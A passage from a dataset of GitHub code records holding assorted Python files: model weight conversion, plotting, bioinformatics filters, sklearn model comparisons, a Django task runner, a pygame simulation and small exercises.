rank=args.rank, init_method=init_method)\n\nimport sat.mpu as mpu\nmpu.initialize_model_parallel(args.model_parallel_size)\n\nfrom sat.model.official.yolos_model import YOLOS\nmodel = YOLOS(args, layernorm_epsilon=1e-6)\n\ndef copy_layer_param(src, dst):\n \"\"\"\n in-place copy from src to dst\n src and dst should be the same layer type, e.g., both are LayerNorm or both are Linear.\n Or at least, both have same named_parameters name and shape.\n \"\"\"\n src_dic = dict(src.named_parameters())\n dst_dic = dict(dst.named_parameters())\n for k in dst_dic:\n assert dst_dic[k].data.shape == src_dic[k].data.shape\n dst_dic[k].data = src_dic[k].data\n assert (dst_dic[k].data == src_dic[k].data).all()\n\ndef copy_from_param(src, dst):\n assert src.data.shape == dst.data.shape\n dst.data = src.data\n\ndef copy_layer_norm(src, dst):\n src_ln = []\n for k, v in src.named_parameters():\n if 'norm' in k.lower() and type(v) is not torch.nn.Identity():\n src_ln.append((k, v))\n dst_ln = []\n for k, v in dst.named_parameters():\n if 'layernorm' in k.lower():\n dst_ln.append((k, v))\n assert len(src_ln) == len(dst_ln)\n for kvs, kvd in zip(src_ln, dst_ln):\n assert kvd[1].data.shape == kvs[1].data.shape\n kvd[1].data = kvs[1].data\n assert (kvd[1].data == kvs[1].data).all()\n\ndef copy_transformer_layer_wo_ln(src, dst):\n new_weight = src.attn.qkv.weight.data\n assert dst.attention.query_key_value.weight.data.shape == new_weight.shape\n dst.attention.query_key_value.weight.data = new_weight\n new_bias = src.attn.qkv.bias.data\n assert dst.attention.query_key_value.bias.data.shape == new_bias.shape\n dst.attention.query_key_value.bias.data = new_bias\n copy_layer_param(src.attn.proj, dst.attention.dense)\n copy_layer_param(src.mlp.fc1, dst.mlp.dense_h_to_4h)\n copy_layer_param(src.mlp.fc2, dst.mlp.dense_4h_to_h)\n\ndef transform_weight(src_model, swiss_model):\n words = torch.cat((src_model.backbone.cls_token.data[0], src_model.backbone.det_token.data[0]))\n copy_from_param(words, swiss_model.transformer.word_embeddings.weight)\n copy_from_param(src_model.backbone.pos_embed.data[0], swiss_model.transformer.position_embeddings.weight)\n copy_layer_norm(src_model.backbone, swiss_model)\n for src_l, dst_l in zip(src_model.backbone.blocks, swiss_model.transformer.layers):\n copy_transformer_layer_wo_ln(src_l, dst_l)\n copy_layer_param(src_model.backbone.patch_embed.proj, swiss_model.mixins.patch_embedding.proj)\n copy_layer_param(src_model.class_embed, swiss_model.mixins.det_head.class_embed)\n copy_layer_param(src_model.bbox_embed, swiss_model.mixins.det_head.bbox_embed)\n \n\nyolos.eval()\nmodel.eval()\nwith torch.no_grad():\n transform_weight(yolos, model)\n images = torch.randn(2, 3, 800, 1333)*10\n src_output = yolos(images)\n\n batch_size, _, height, width = images.shape\n num_patches = (height//16) * (width//16)\n seq_len = 1 + num_patches + model.get_mixin('det_head').num_det_tokens\n position_ids = torch.cat([torch.arange(seq_len)[None,]]*batch_size)\n encoded_input = {'input_ids':torch.cat([torch.arange(1+model.get_mixin('det_head').num_det_tokens)[None,]]*batch_size).long(), 'image':images, 'position_ids':position_ids}\n encoded_input['attention_mask'] = None\n\n dst_output = model(**encoded_input, offline=True) # offline=False, height=height//16, width=width//16)[0]\n\n torch.save({'module':model.state_dict()}, \"output.pt\")\n\nbreakpoint()\n","repo_name":"THUDM/SwissArmyTransformer","sub_path":"examples/yolos/transform_param.py","file_name":"transform_param.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","stars":743,"dataset":"github-code","pt":"52"} +{"seq_id":"19026608004","text":"#############\n## Package ##\n#############\nimport os\nimport sys\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom pyqtgraph.examples.colorMaps import cm\n\n\n\ndef cell_over_time_one_patient(data_source_folder,\n data_destination_folder,\n figure_name,\n column=2,\n saved=True):\n \"\"\"\n :param data_source_folder: path to folder that contain Thsd_1500_p5X.dat file\n :param data_destination_folder:\n :param figure_name:\n :param column:\n :param saved:\n :return:\n \"\"\"\n\n # Basic information\n source = os.path.join(data_source_folder, 'Thsd_1500_p5X.dat')\n destination = data_destination_folder\n\n # Figure\n plt.style.use('ipynb')\n fig = plt.figure(figsize=(10,5))\n\n # Data\n df = pd.read_csv(source, header=None)\n # time column\n time_ = df.iloc[:, 0]\n # cell column\n cell = df.iloc[:, column]\n\n # Plotting\n plt.scatter(time_, cell, linewidth=2, marker='.', s=8)\n\n # Labels\n plt.xlabel(\"Temps (min)\", fontsize=16)\n plt.ylabel(\"Nombre de cellules cancéreuses\",fontsize=16)\n\n # Ticks\n plt.ticklabel_format(useOffset=False, style='plain', axis='y')\n plt.ticklabel_format(useOffset=False, style='plain', axis='x')\n\n plt.xticks(fontsize=14)\n plt.yticks(fontsize=14)\n\n if saved:\n figure_path = os.path.join(destination, f\"{figure_name}.png\")\n plt.savefig(figure_path)\n plt.close()\n return figure_path\n\n else:\n plt.show()\n\nif __name__ == \"__main__\":\n print(*sys.argv, sep='\\n')\n cell_over_time_one_patient(*sys.argv[1::])\n","repo_name":"Jhebertaz/PhysiCellGui","sub_path":"addons/SimulationWithPhysiCell/script/cell_over_time_one_patient.py","file_name":"cell_over_time_one_patient.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24423154109","text":"class Solution:\n def dominantIndex(self, nums: List[int]) -> int:\n if len(nums)==1:\n return 0\n else:\n largest=max(nums)\n larg_index=nums.index(largest)\n nums=[val for val in nums if val!=largest]\n for i in nums:\n if largest>=2*i:\n continue\n else:\n return -1\n return larg_index\n ","repo_name":"abhiraj24/Leetcode","sub_path":"largest-number-at-least-twice-of-others/largest-number-at-least-twice-of-others.py","file_name":"largest-number-at-least-twice-of-others.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42573536369","text":"#!/usr/bin/env python\n\nfrom Bio import SeqIO\nimport sys\n\nsyntax = '''\n------------------------------------------------------------------------------------\nSyntax: python extract_sequence_by_name_list.py *file1.fasta *file2.txt\n*Sequences in fasta format \n**List of sequences to extract; must have the same name as in fasta file without '>'\n------------------------------------------------------------------------------------\n'''\nif len(sys.argv) != 3:\n print(syntax)\n sys.exit()\n\nfrom Bio import SeqIO \nimport sys \n\nwanted = [line.strip() for line in open(sys.argv[2])] \nseqiter = SeqIO.parse(open(sys.argv[1]), 'fasta') \nSeqIO.write((seq for seq in seqiter if seq.id in wanted), sys.stdout, \"fasta\")\n","repo_name":"kieft1bp/ASVs_to_Genomes","sub_path":"get_fasta_seqs.py","file_name":"get_fasta_seqs.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72455878566","text":"#!/usr/bin/env python3\n\"\"\"Remove indels which are falsely aligned as runs of single base mismatches in\nother samples.\"\"\"\n# This script is awful\nimport sys\n\nimport click\n\nfrom pandas import read_csv\nfrom plumbum.cmd import rg\n\n\nBASE_IDX = {\n \"A\": [4, 8],\n \"T\": [5, 9],\n \"C\": [6, 10],\n \"G\": [7, 11]\n}\n\n\ndef is_insertion(indel):\n return len(indel[\"REF\"]) < len(indel[\"ALT\"])\n\n\ndef get_ref_base(chrom, pos, pileup):\n exit_code, stdout, stderr = rg.run(\n [\"\\s\".join([chrom, str(pos)]), pileup],\n retcode=None\n )\n if exit_code != 0:\n return 0\n return stdout.split()[2]\n\n\ndef check_indel(indel, pileups):\n if is_insertion(indel):\n bad_bases = indel[\"ALT\"][1:]\n indel_length = len(indel[\"ALT\"])\n else:\n indel_length = len(indel[\"REF\"])\n bad_base_start = indel[\"POS\"] + indel_length\n bad_base_pos = range(bad_base_start, bad_base_start + indel_length)\n bad_bases = [\n get_ref_base(indel[\"CHROM\"], pos, pileups[0])\n for pos in bad_base_pos\n ]\n if any([base == 0 for base in bad_bases]):\n return True\n adj_base = int(indel[\"POS\"] + 1)\n adj_base_pos = range(adj_base, adj_base + indel_length - 1)\n for bad, adj in zip(bad_bases, adj_base_pos):\n if get_ref_base(indel[\"CHROM\"], adj, pileups[0]) != bad:\n for pileup in pileups:\n counts = rg.run(\n [\"\\s\".join([indel[\"CHROM\"], str(adj)]),\n pileup], retcode=None\n )[1].split()\n if counts:\n target_base_counts = (\n int(counts[BASE_IDX[bad][0]]) +\n int(counts[BASE_IDX[bad][1]])\n )\n if target_base_counts > 0:\n return False\n return True\n\n\ndef filter_indels(pileups, indels):\n if len(indels):\n passing = indels.apply(check_indel, axis=1, pileups=pileups)\n filtered_indels = indels[passing]\n else:\n filtered_indels = indels\n filtered_indels.to_csv(sys.stdout, sep=\"\\t\", index=False)\n\n\n@click.command()\n@click.option(\"--indels\", help=\"TSV file containing indels.\")\n@click.argument(\"pileups\", nargs=-1)\ndef cli(pileups, indels):\n filter_indels(pileups, read_csv(indels, sep=\"\\t\"))\n\n\nif __name__ == \"__main__\":\n cli()\n","repo_name":"fennerm/megadaph","sub_path":"pipe/scripts/filter_misaligned_shared_indels.py","file_name":"filter_misaligned_shared_indels.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73810356004","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom pandas import set_option\nfrom pandas.plotting import scatter_matrix\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import KFold\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.linear_model import Lasso\nfrom sklearn.linear_model import ElasticNet\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.svm import SVR\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.ensemble import RandomForestRegressor, RandomForestClassifier\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.ensemble import ExtraTreesRegressor\nfrom sklearn.ensemble import AdaBoostRegressor, AdaBoostClassifier\nfrom sklearn.metrics import mean_squared_error\nfrom xgboost import XGBRegressor, XGBClassifier\nfrom lightgbm import LGBMRegressor, LGBMClassifier\nfrom catboost import CatBoostRegressor, CatBoostClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.svm import SVC\nfrom sklearn import preprocessing\nimport seaborn as sns\n\nimport numpy as np\nfrom sklearn import datasets\nfrom sklearn.datasets import fetch_covtype\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.python.keras.metrics import accuracy\nfrom tensorflow.python.keras.utils.metrics_utils import result_wrapper\n\n#1. 데이터\ndatasets= fetch_covtype()\n# id column은 필요없으니 제거\nx = datasets.data\ny = datasets.target\n\n\n# import pandas as pd\n# y = pd.get_dummies(y)\n# print(y)\n\nX_train, X_valid, y_train, y_valid = train_test_split(x,y\n ,test_size=0.3,random_state=66)\n\n\nX_train\nX_valid\ny_train\ny_valid\n\n# # Base\n\n# num_folds= 10\n# seed = 7\n# scoring = 'neg_root_mean_squared_error'\n# X_all = x[y.columns.tolist()]\n# y_all =x['Body Mass (g)']\n\n# X_train, X_valid, y_train, y_valid = train_test_split(x[y.columns.tolist()],x['Body Mass (g)']\n# ,test_size=0.3,random_state=66)\n\n\nmodels = []\nmodels.append(('LR',LinearRegression()))\nmodels.append(('LASSO',Lasso()))\nmodels.append(('KNN',KNeighborsRegressor()))\nmodels.append(('CART',DecisionTreeRegressor()))\nmodels.append(('EN',ElasticNet()))\nmodels.append(('SVM',SVR()))\nmodels.append(('RFR',RandomForestRegressor()))\nmodels.append(('XGBR',XGBRegressor()))\nmodels.append(('LGBMR',LGBMRegressor()))\nmodels.append(('AdaR',AdaBoostRegressor()))\nmodels.append(('Cat',CatBoostRegressor(verbose=False)))\nmodels.append(('Xtree',ExtraTreesRegressor()))\n\nscoring = 'neg_root_mean_squared_error'\nresults =[]\nnames = []\nfor name, model in models:\n kfold = KFold(n_splits=10,random_state=66,shuffle = True)\n cv_results = cross_val_score(model,X_train,y_train\n ,cv= kfold,scoring='neg_root_mean_squared_error')\n results.append(cv_results)\n names.append(name)\n msg = \"%s : %f (%f) \"%(name,cv_results.mean(),cv_results.std())\n print(msg)\n\n\n\n\n#standardization\n\npipelines = []\npipelines.append(('ScaledLR',Pipeline([('Scaler',preprocessing.StandardScaler()),('LR',LinearRegression())])))\npipelines.append(('ScaledLASSO',Pipeline([('Scaler',preprocessing.StandardScaler()),('LASSO',Lasso())])))\npipelines.append(('ScaledKNN',Pipeline([('Scaler',preprocessing.StandardScaler()),('KNN',KNeighborsRegressor())])))\npipelines.append(('ScaledCART',Pipeline([('Scaler',preprocessing.StandardScaler()),('CART',DecisionTreeRegressor())])))\npipelines.append(('ScaledEN',Pipeline([('Scaler',preprocessing.StandardScaler()),('EN',ElasticNet())])))\npipelines.append(('ScaledSVM',Pipeline([('Scaler',preprocessing.StandardScaler()),('SVM',SVR())])))\npipelines.append(('ScaledRFR',Pipeline([('Scaler',preprocessing.StandardScaler()),('RFR',RandomForestRegressor())])))\npipelines.append(('ScaledXGBR',Pipeline([('Scaler',preprocessing.StandardScaler()),('XGBR',XGBRegressor())])))\npipelines.append(('ScaledLGBMR',Pipeline([('Scaler',preprocessing.StandardScaler()),('LGBMR',LGBMRegressor())])))\npipelines.append(('ScaledAdaR',Pipeline([('Scaler',preprocessing.StandardScaler()),('AdaR',AdaBoostRegressor())])))\npipelines.append(('ScaledCat',Pipeline([('Scaler',preprocessing.StandardScaler()),('Cat',CatBoostRegressor(verbose=False))])))\npipelines.append(('ScaledXtree',Pipeline([('Scaler',preprocessing.StandardScaler()),('Xtree',ExtraTreesRegressor())])))\n\nresults_scaled =[]\nnames_scaled = []\nfor name, model in pipelines:\n kfold = KFold(n_splits=10,random_state=66,shuffle = True)\n cv_results = cross_val_score(model,X_train,y_train\n ,cv= kfold,scoring=scoring)\n results_scaled.append(cv_results)\n names_scaled.append(name)\n msg = \"%s : %f (%f) \"%(name,cv_results.mean(),cv_results.std())\n print(msg)\n \n \n \n \n \n \n \n \n \n \nscaler = preprocessing.StandardScaler().fit(X_all)\nscaled_X = scaler.transform(X_all)\nparams = { 'n_estimators' : [10, 50,100],\n 'max_depth' : [6, 12,18,24],\n 'min_samples_leaf' : [1, 6, 12, 18],\n 'min_samples_split' : [2, 8, 16, 20]\n }\nmodel = RandomForestRegressor()\nkfold = KFold(n_splits= num_folds,random_state = 66 ,shuffle = True)\ngrid = GridSearchCV(estimator= model, param_grid = params,scoring= 'neg_root_mean_squared_error',cv=kfold )\ngrid_result = grid.fit(scaled_X,y_all)\n\nprint(\"Best : %f using %s \"%(grid_result.best_score_,grid_result.best_params_)) \n \n \n \n \nparams = { 'n_estimators' : [10, 50,100],\n 'max_depth' : [6,12,18,24],\n 'min_samples_leaf' : [1, 6, 12, 18],\n 'min_samples_split' : [2,4,8, 16]\n }\nmodel =ExtraTreesRegressor()\nkfold = KFold(n_splits= num_folds,random_state = 66 ,shuffle = True)\ngrid = GridSearchCV(estimator= model, param_grid = params, scoring= 'neg_root_mean_squared_error',cv=kfold )\ngrid_result = grid.fit(X_all,y_all) \n \n \n\nprint(\"Best : %f using %s \"%(grid_result.best_score_,grid_result.best_params_))\n\n \n \nfrom sklearn.metrics import mean_squared_error\nimport math \n \n \nerrors = []\npred_valid=[]\npred_test = [] \n \n \nscaler = preprocessing.StandardScaler().fit(X_train)\nscaled_X_train = scaler.transform(X_train)\nscaled_X_valid = scaler.transform(X_valid)\nscaled_X_test = scaler.transform(test) \n \n \n \nlasso = Lasso()\nlasso.fit(X_train,y_train)\nlasso_valid = lasso.predict(X_valid)\nrmse = math.sqrt(mean_squared_error(y_valid, lasso_valid))\nerrors.append(('Lasso',rmse))\npred_valid.append(('Lasso',lasso_valid))\nlasso_test = lasso.predict(test)\npred_test.append(('Lasso',lasso_test)) \n \n \nLR =LinearRegression()\nLR.fit(scaled_X_train,y_train)\nlr_valid = LR.predict(scaled_X_valid)\nrmse = math.sqrt(mean_squared_error(y_valid, lr_valid))\nerrors.append(('LR',rmse))\npred_valid.append(('LR',lr_valid))\nlr_test = LR.predict(scaled_X_test)\npred_test.append(('LR',lr_test)) \n \n \nRF =RandomForestRegressor(max_depth= 24, min_samples_leaf= 12, min_samples_split= 16, n_estimators= 40)\nRF.fit(scaled_X_train,y_train)\nrf_valid = RF.predict(scaled_X_valid)\nrmse = math.sqrt(mean_squared_error(y_valid, rf_valid))\nerrors.append(('RF',rmse))\npred_valid.append(('RF',rf_valid))\nrf_test = RF.predict(scaled_X_test)\npred_test.append(('RF',rf_test)) \n \nET =ExtraTreesRegressor(max_depth=24, min_samples_leaf= 12, min_samples_split= 16, n_estimators= 40)\nET.fit(X_train,y_train)\net_valid = ET.predict(X_valid)\nrmse = math.sqrt(mean_squared_error(y_valid, et_valid))\nerrors.append(('ET',rmse))\npred_valid.append(('ET',et_valid))\net_test = ET.predict(test)\npred_test.append(('ET',et_test)) \n \nCAT = CatBoostRegressor(iterations=10000,random_state=66\n ,eval_metric=\"RMSE\")\nCAT.fit(X_train,y_train, eval_set=[(X_valid,y_valid)],early_stopping_rounds=30\n ,verbose=1000 )\ncat_valid = CAT.predict(X_valid)\nrmse = math.sqrt(mean_squared_error(y_valid, cat_valid))\nerrors.append(('CAT',rmse))\npred_valid.append(('CAT',cat_valid))\ncat_test = CAT.predict(test)\npred_test.append(('CAT',cat_test))\n\n\n \n \nfor name, error in errors:\n print(\"{} : {}\".format(name,error)) \n \n \nval= np.zeros(X_valid.shape[0])\nfor name, pred in pred_valid:\n val+= (0.2* pred)\nmath.sqrt(mean_squared_error(y_valid, val)) \n \n \n \n \nval= np.zeros(X_valid.shape[0])\nfor name, pred in pred_valid:\n if name == 'Lasso' or name=='LR' or name == 'ET' or name=='CAT':\n val+= (0.25* pred)\nmath.sqrt(mean_squared_error(y_valid, val)) \n \n \n \ntest_val= np.zeros(test.shape[0])\nfor name, pred in pred_test:\n if name == 'Lasso' or name=='LR' or name == 'ET' or name=='CAT':\n test_val+= (0.25* pred)\n\n#model.save_weights(\"./_save/keras999_1_save_weights.h5\")\n#model = load_model('./_ModelCheckPoint/ss_ki_1222_Trafevol5.hdf5')\n \n# submission = pd.read_csv(path+'sample_submission.csv')\n# submission['Body Mass (g)'] = test_val\n# submission.to_csv(path+\"penguin_0107_03.csv\", index=False)\n'''\n\n\n\n'''","repo_name":"jangsejong/STUDY","sub_path":"machine_running/ml03/ml03_4_fetch_covtype.py","file_name":"ml03_4_fetch_covtype.py","file_ext":"py","file_size_in_byte":9160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30211071086","text":"#Listede tanımlanan değerlerden çift olanlarını ekrana yazdırınız.\r\n\r\nliste = [1, 2, 3, 4, 5, 6, 7, 8, 9]\r\n\r\nfor i in liste:\r\n if i % 2 == 0:\r\n print(i)\r\n\r\n\r\n#sayi%5==1\r\n#bu şu demek sayının 5 e bölümünden kalan 1 dir","repo_name":"xdejavu/BilsemDersPython","sub_path":"Ders8/uygulama.py","file_name":"uygulama.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39081182175","text":"import logging\nfrom typing import cast\n\nfrom django.apps import apps\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\n\nfrom django_stator.models import StatorModel\nfrom django_stator.runner import StatorRunner\n\nlogger = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n help = \"Runs a Stator runner\"\n\n def add_arguments(self, parser):\n parser.add_argument(\n \"--concurrency\",\n \"-c\",\n type=int,\n default=None,\n help=\"How many threads to provision\",\n )\n parser.add_argument(\n \"--liveness-file\",\n type=str,\n default=None,\n help=\"A file to touch at least every 30 seconds to say the runner is alive\",\n )\n parser.add_argument(\n \"--run-for\",\n \"-r\",\n type=int,\n default=0,\n help=\"How long to run for before exiting (defaults to infinite)\",\n )\n parser.add_argument(\n \"--exclude\",\n \"-x\",\n type=str,\n action=\"append\",\n help=\"Model labels that should not be processed\",\n )\n parser.add_argument(\"model_labels\", nargs=\"*\", type=str)\n\n def handle(\n self,\n model_labels: list[str],\n exclude: list[str],\n run_for: int,\n liveness_file: str | None = None,\n concurrency: int = getattr(settings, \"STATOR_CONCURRENCY\", 10),\n *args,\n **options,\n ):\n # Cache system config\n logging.basicConfig(\n format=\"[%(asctime)s] %(levelname)8s - %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n level=logging.INFO,\n force=True,\n )\n # Resolve the models list into names\n models = cast(\n list[type[StatorModel]],\n [apps.get_model(label) for label in model_labels],\n )\n excluded = cast(\n list[type[StatorModel]],\n [apps.get_model(label) for label in (exclude or [])],\n )\n if not models:\n models = StatorModel.subclasses\n models = [model for model in models if model not in excluded]\n logger.info(\n \"Running for models: \" + \" \".join(m._meta.label_lower for m in models)\n )\n # Run a runner\n runner = StatorRunner(\n models,\n concurrency=concurrency,\n liveness_file=liveness_file,\n )\n try:\n runner.run(run_for=run_for)\n except KeyboardInterrupt:\n logger.critical(\"Ctrl-C received\")\n","repo_name":"andrewgodwin/django-stator","sub_path":"django_stator/management/commands/runstator.py","file_name":"runstator.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"52"} +{"seq_id":"14259664301","text":"array = {}\ni = 0\na = input(\"Enter the number of students: \")\nwhile i < int(a) :\n i=i+1\n print(f\"enter the name of student {i}:\",end=\" \")\n student = input()\n print(f\"enter the mark of student {i}:\",end=\" \")\n mark = input()\n array[student] = mark\nprint(array)\n\nprint(\"enter the name of student to retrive name\")\nname = input(\"enter the name \")\nprint(array[name])\n","repo_name":"aparna2345/python--samples","sub_path":"sample20.py","file_name":"sample20.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11212408174","text":"import matplotlib.pyplot as plt\nfrom math import cos, sin, radians\n\nlength = 10\n\n#plt.arrow(0.2, 0, 0.5, 0.5)\n#plt.arrow(2, 0, 0.5, 0.5, head_width=0.05, head_length=0.1, fc='k', ec='k')\n\nlista = []\n\"\"\"\nwith open(\"students001.vsp\") as f:\n for line in f:\n word = line.split()\n if(len(word) == 8):\n lista.append([float(word[0]),float(word[1]),radians(float(word[3]))])\nwith open(\"students003.vsp\") as f:\n for line in f:\n word = line.split()\n if(len(word) == 8):\n lista.append([float(word[0]),float(word[1]),radians(float(word[3]))])\n\"\"\"\n\ndef reader(file, list):\n print(\"hej\")\n file.readline()\n line = file.readline()\n while line:\n points = int(line.split()[0])\n line=file.readline()\n for x in range(1, points):\n line=file.readline()\n word = line.split()\n lista.append([float(word[0]),float(word[1]),radians(float(word[3]))])\n line = file.readline()\n\n\nwith open(\"students001.vsp\") as f:\n reader(f, lista)\n\n\nprev = []\nfor point in lista:\n plt.arrow(point[0],point[1],length*sin(point[2]),length*cos(point[2]), head_width=5)\n\nxmax = 400\nymax = 400\nplt.axis([-xmax,xmax,-ymax,ymax])\nplt.show()\n","repo_name":"plundahl/CrowdAnomalyDetection","sub_path":"showAll.py","file_name":"showAll.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"23867201047","text":"import pygame\r\nfrom app.Organisms.Animal import Animal\r\nfrom app.Coordinates import Coordinates\r\nimport sys\r\n\r\n\r\nclass Human (Animal):\r\n\r\n def __init__(self, world, location):\r\n super().__init__(world, 5, 4, \"#\", \"app\\\\utilities\\\\human.bmp\", location)\r\n\r\n def reproduce(self, org):\r\n pass\r\n\r\n def action(self):\r\n self.immortality()\r\n self.makeMove(1)\r\n\r\n def immortality(self):\r\n if self._world.getSuperPower():\r\n self._world.setRounds(self._world.getRounds() + 1)\r\n if self._world.getRounds() == 5:\r\n self._world.setSuperPower(False)\r\n self._world.setToNext(0)\r\n else:\r\n self._world.setToNext(self._world.getToNext() + 1)\r\n if self._world.getToNext() >= 5:\r\n case = True\r\n super = False\r\n while case:\r\n for event in pygame.event.get():\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_y:\r\n super = True\r\n case = False\r\n elif event.key == pygame.K_n:\r\n case = False\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n if super:\r\n self._world.setSuperPower(True)\r\n self._world.setRounds(1)\r\n\r\n def makeMove(self, counter):\r\n counter += 1\r\n temp = Coordinates(0, 0)\r\n case = True\r\n while case:\r\n for event in pygame.event.get():\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_UP:\r\n temp.y = -1\r\n case = False\r\n elif event.key == pygame.K_DOWN:\r\n temp.y = 1\r\n case = False\r\n elif event.key == pygame.K_RIGHT:\r\n temp.x = 1\r\n case = False\r\n elif event.key == pygame.K_LEFT:\r\n temp.x = -1\r\n case = False\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n self.makeMoveToField(temp, counter)\r\n\r\n def collision(self, org):\r\n if not self._world.getSuperPower() or self.getStrength() > org.getStrength():\r\n super().collision(org)\r\n else:\r\n newCoo = self._world.findField(self.getLoc().y, self.getLoc().x)\r\n if not self._world.isOutside(newCoo):\r\n self.move(newCoo)\r\n","repo_name":"kobas172/world-simulation-python","sub_path":"app/Organisms/Animals/Human.py","file_name":"Human.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9148597225","text":"money = int(input(\"교환할 돈은 얼마 입니까? \"))\n\nc500 = money //500\nchange = money % 500\n\nc100 = change // 100\nchange = change % 100\n\nc50 = change // 50\nchange = change % 50\n\nc10 = change // 10\nchange = change % 10\n\nprint(\"\\n오백원짜리 : {}개\".format(c500))\nprint(\"/n백원짜리 : {}개\".format(c100))\nprint(\"/n오십원짜리 : {}개\".format(c50))\nprint(\"/n십원짜리 : {}개\".format(c10))\nprint(\"바꾸지 못한 잔돈 : {}\".format(change))\n","repo_name":"sdoohee/TIL","sub_path":"Python/pythonWorkspace/ch03-operators/03-operators-ex2.py","file_name":"03-operators-ex2.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39160192678","text":"import pytest\nimport pandas as pd\n\nfrom src.modeling.clean import aggregate_by_keys, transform_vars, method_to_func\n\ndf_in = pd.DataFrame([['3.0L', '24995'],\n ['3.0L', 10995],\n ['3.0L', '57990'],\n ['1.0L', 5107],\n ['2.0L', 23000],\n ['2.2L', 11999],\n ['1.6L', 1295],\n ['2.2L', 17990],\n ['2.0L', 2865],\n ['3.0L', 2490],\n ['2.2L', 2694],\n ['1.9L', 1290],\n ['1.2L', 13795],\n ['2.0L', '25989'],\n ['1.33L', '5950'],\n ['2.4L', '7495'],\n ['1.8L', '2795'],\n ['1.7L', '4799'],\n ['1.4L', 14791],\n ['1.6L', 6995]], columns=['engin_size', 'price'])\ntransformation = {'vars_strip_numeric': ['engin_size'],\n 'vars_drop_non_numeric_rows': ['price']}\n\ndf_in_2 = pd.DataFrame([['Hyundai', 2018, 5.0, 4.0],\n ['Dacia', 2018, 5.0, 5.0],\n ['Volkswagen', 2018, 5.0, 5.0],\n ['Jaguar', 2017, 5.0, 4.0],\n ['Mercedes-Benz', 2021, 5.0, 5.0],\n ['Mitsubishi', 2018, 5.0, 3.0],\n ['Land Rover', 2018, 5.0, 5.0],\n ['MINI', 2018, 2.0, 2.0],\n ['Renault', 2020, 5.0, 5.0],\n ['Peugeot', 2018, 5.0, 5.0],\n ['Land Rover', 2021, 5.0, 5.0],\n ['Subaru', 2018, 5.0, 5.0],\n ['Peugeot', 2018, 5.0, 5.0],\n ['Renault', 2018, 5.0, 5.0],\n ['Mercedes-Benz', 2018, 5.0, 5.0],\n ['Kia', 2018, 5.0, 3.0],\n ['Jaguar', 2018, 2.0, 2.0],\n ['Jaguar', 2018, 5.0, 4.0],\n ['Ford', 2018, 7.0, 5.0],\n ['Ford', 2018, 5.0, 5.0]], columns=['maker', 'year', 'seat_num', 'door_num'])\naggregation = {\n 'key_cols': ['maker', 'year'],\n 'key_path': 'data/processed/teskeys.csv',\n 'agg_cols_transforms': {\n 'seat_num': 'first',\n 'door_num': 'mode'\n }\n}\n\n\ndef test_transform_vars_expected() -> None:\n \"\"\"\n Test if `transform_vars` works as expected.\n \"\"\"\n df_true = pd.DataFrame([[3.0000e+00, 2.4995e+04],\n [3.0000e+00, 1.0995e+04],\n [3.0000e+00, 5.7990e+04],\n [1.0000e+00, 5.1070e+03],\n [2.0000e+00, 2.3000e+04],\n [2.2000e+00, 1.1999e+04],\n [1.6000e+00, 1.2950e+03],\n [2.2000e+00, 1.7990e+04],\n [2.0000e+00, 2.8650e+03],\n [3.0000e+00, 2.4900e+03],\n [2.2000e+00, 2.6940e+03],\n [1.9000e+00, 1.2900e+03],\n [1.2000e+00, 1.3795e+04],\n [2.0000e+00, 2.5989e+04],\n [1.3300e+00, 5.9500e+03],\n [2.4000e+00, 7.4950e+03],\n [1.8000e+00, 2.7950e+03],\n [1.7000e+00, 4.7990e+03],\n [1.4000e+00, 1.4791e+04],\n [1.6000e+00, 6.9950e+03]],\n 